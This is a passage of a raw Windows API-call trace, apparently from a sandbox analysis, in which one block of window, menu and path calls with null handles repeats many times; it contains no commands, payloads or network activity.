out: pszPath=0x0) returned 0 [0027.704] PathFileExistsW (pszPath=0x0) returned 0 [0027.704] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.704] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.704] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.704] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.704] GetMenu (hWnd=0x0) returned 0x0 [0027.704] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.704] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.704] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.704] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.704] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.704] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.704] GetStockObject (i=6) returned 0x1b00018 [0027.705] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.705] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.705] PathFileExistsW (pszPath=0x0) returned 0 [0027.705] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.705] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.705] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.705] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.705] GetMenu (hWnd=0x0) returned 0x0 [0027.705] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2f2) returned -1 [0027.705] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.705] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.705] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.705] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.705] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.705] GetStockObject (i=6) returned 0x1b00018 [0027.705] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.705] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.705] PathFileExistsW (pszPath=0x0) returned 0 [0027.705] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.705] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.705] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.705] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.705] GetMenu (hWnd=0x0) returned 0x0 [0027.705] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.705] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.705] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.705] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.705] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.705] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.705] GetStockObject (i=6) returned 0x1b00018 [0027.705] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.705] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.705] PathFileExistsW (pszPath=0x0) returned 0 [0027.705] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.706] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.706] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.706] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.706] GetMenu (hWnd=0x0) returned 0x0 [0027.706] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.706] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.706] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.706] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.706] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.706] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.706] GetStockObject (i=6) returned 0x1b00018 [0027.706] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.706] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.706] PathFileExistsW (pszPath=0x0) returned 0 [0027.706] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.706] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.706] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.706] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.706] GetMenu (hWnd=0x0) returned 0x0 [0027.706] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.706] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.706] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.706] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.706] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.706] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.706] GetStockObject (i=6) returned 0x1b00018 [0027.706] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.706] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.706] PathFileExistsW (pszPath=0x0) returned 0 [0027.706] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.706] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.706] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.707] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.707] GetMenu (hWnd=0x0) returned 0x0 [0027.707] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.707] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.707] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.707] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.707] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.707] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.707] GetStockObject (i=6) returned 0x1b00018 [0027.707] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.707] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.707] PathFileExistsW (pszPath=0x0) returned 0 [0027.707] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.707] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.707] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.707] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.707] GetMenu (hWnd=0x0) returned 0x0 [0027.707] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x433) returned -1 [0027.707] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.707] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.707] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.707] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.707] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.707] GetStockObject (i=6) returned 0x1b00018 [0027.707] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.707] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.707] PathFileExistsW (pszPath=0x0) returned 0 [0027.707] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.707] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.707] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.707] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.707] GetMenu (hWnd=0x0) returned 0x0 [0027.707] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.708] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.708] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.708] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.708] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.708] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.708] GetStockObject (i=6) returned 0x1b00018 [0027.708] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.708] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.708] PathFileExistsW (pszPath=0x0) returned 0 [0027.708] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.708] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.708] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.708] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.708] GetMenu (hWnd=0x0) returned 0x0 [0027.708] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.708] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.708] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.708] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.708] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.708] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.708] GetStockObject (i=6) returned 0x1b00018 [0027.708] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.708] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.708] PathFileExistsW (pszPath=0x0) returned 0 [0027.708] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.708] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.708] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.708] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.708] GetMenu (hWnd=0x0) returned 0x0 [0027.708] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.708] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.708] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.708] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.708] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.709] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.709] GetStockObject (i=6) returned 0x1b00018 [0027.709] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.709] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.709] PathFileExistsW (pszPath=0x0) returned 0 [0027.709] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.709] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.709] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.709] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.709] GetMenu (hWnd=0x0) returned 0x0 [0027.709] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.709] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.709] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.709] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.709] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.709] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.709] GetStockObject (i=6) returned 0x1b00018 [0027.709] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.709] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.709] PathFileExistsW (pszPath=0x0) returned 0 [0027.709] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.709] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.709] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.709] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.709] GetMenu (hWnd=0x0) returned 0x0 [0027.709] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x417) returned -1 [0027.709] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.709] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.709] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.709] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.709] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.709] GetStockObject (i=6) returned 0x1b00018 [0027.710] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.710] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.710] PathFileExistsW (pszPath=0x0) returned 0 [0027.710] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.710] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.710] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.710] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.710] GetMenu (hWnd=0x0) returned 0x0 [0027.710] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.710] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.710] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.710] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.710] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.710] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.710] GetStockObject (i=6) returned 0x1b00018 [0027.710] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.710] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.710] PathFileExistsW (pszPath=0x0) returned 0 [0027.710] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.710] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.710] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.710] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.710] GetMenu (hWnd=0x0) returned 0x0 [0027.710] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.710] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.710] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.710] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.710] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.710] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.710] GetStockObject (i=6) returned 0x1b00018 [0027.710] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.710] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.710] PathFileExistsW (pszPath=0x0) returned 0 [0027.710] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.711] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.711] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.711] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.711] GetMenu (hWnd=0x0) returned 0x0 [0027.711] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.711] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.711] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.711] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.711] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.711] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.711] GetStockObject (i=6) returned 0x1b00018 [0027.711] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.711] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.711] PathFileExistsW (pszPath=0x0) returned 0 [0027.711] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.711] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.711] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.711] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.711] GetMenu (hWnd=0x0) returned 0x0 [0027.711] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.711] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.711] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.711] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.711] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.711] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.711] GetStockObject (i=6) returned 0x1b00018 [0027.711] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.711] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.711] PathFileExistsW (pszPath=0x0) returned 0 [0027.711] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.711] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.711] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.711] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.711] GetMenu (hWnd=0x0) returned 0x0 [0027.712] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4a2) returned -1 [0027.712] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.712] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.712] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.712] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.712] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.712] GetStockObject (i=6) returned 0x1b00018 [0027.712] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.712] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.712] PathFileExistsW (pszPath=0x0) returned 0 [0027.712] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.712] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.712] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.712] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.712] GetMenu (hWnd=0x0) returned 0x0 [0027.712] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.712] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.712] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.712] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.712] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.712] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.712] GetStockObject (i=6) returned 0x1b00018 [0027.712] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.712] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.712] PathFileExistsW (pszPath=0x0) returned 0 [0027.712] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.712] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.712] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.712] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.712] GetMenu (hWnd=0x0) returned 0x0 [0027.712] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.712] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.712] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.713] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.713] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.713] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.713] GetStockObject (i=6) returned 0x1b00018 [0027.713] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.713] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.713] PathFileExistsW (pszPath=0x0) returned 0 [0027.713] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.713] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.713] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.713] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.713] GetMenu (hWnd=0x0) returned 0x0 [0027.713] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.713] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.713] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.713] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.713] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.713] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, 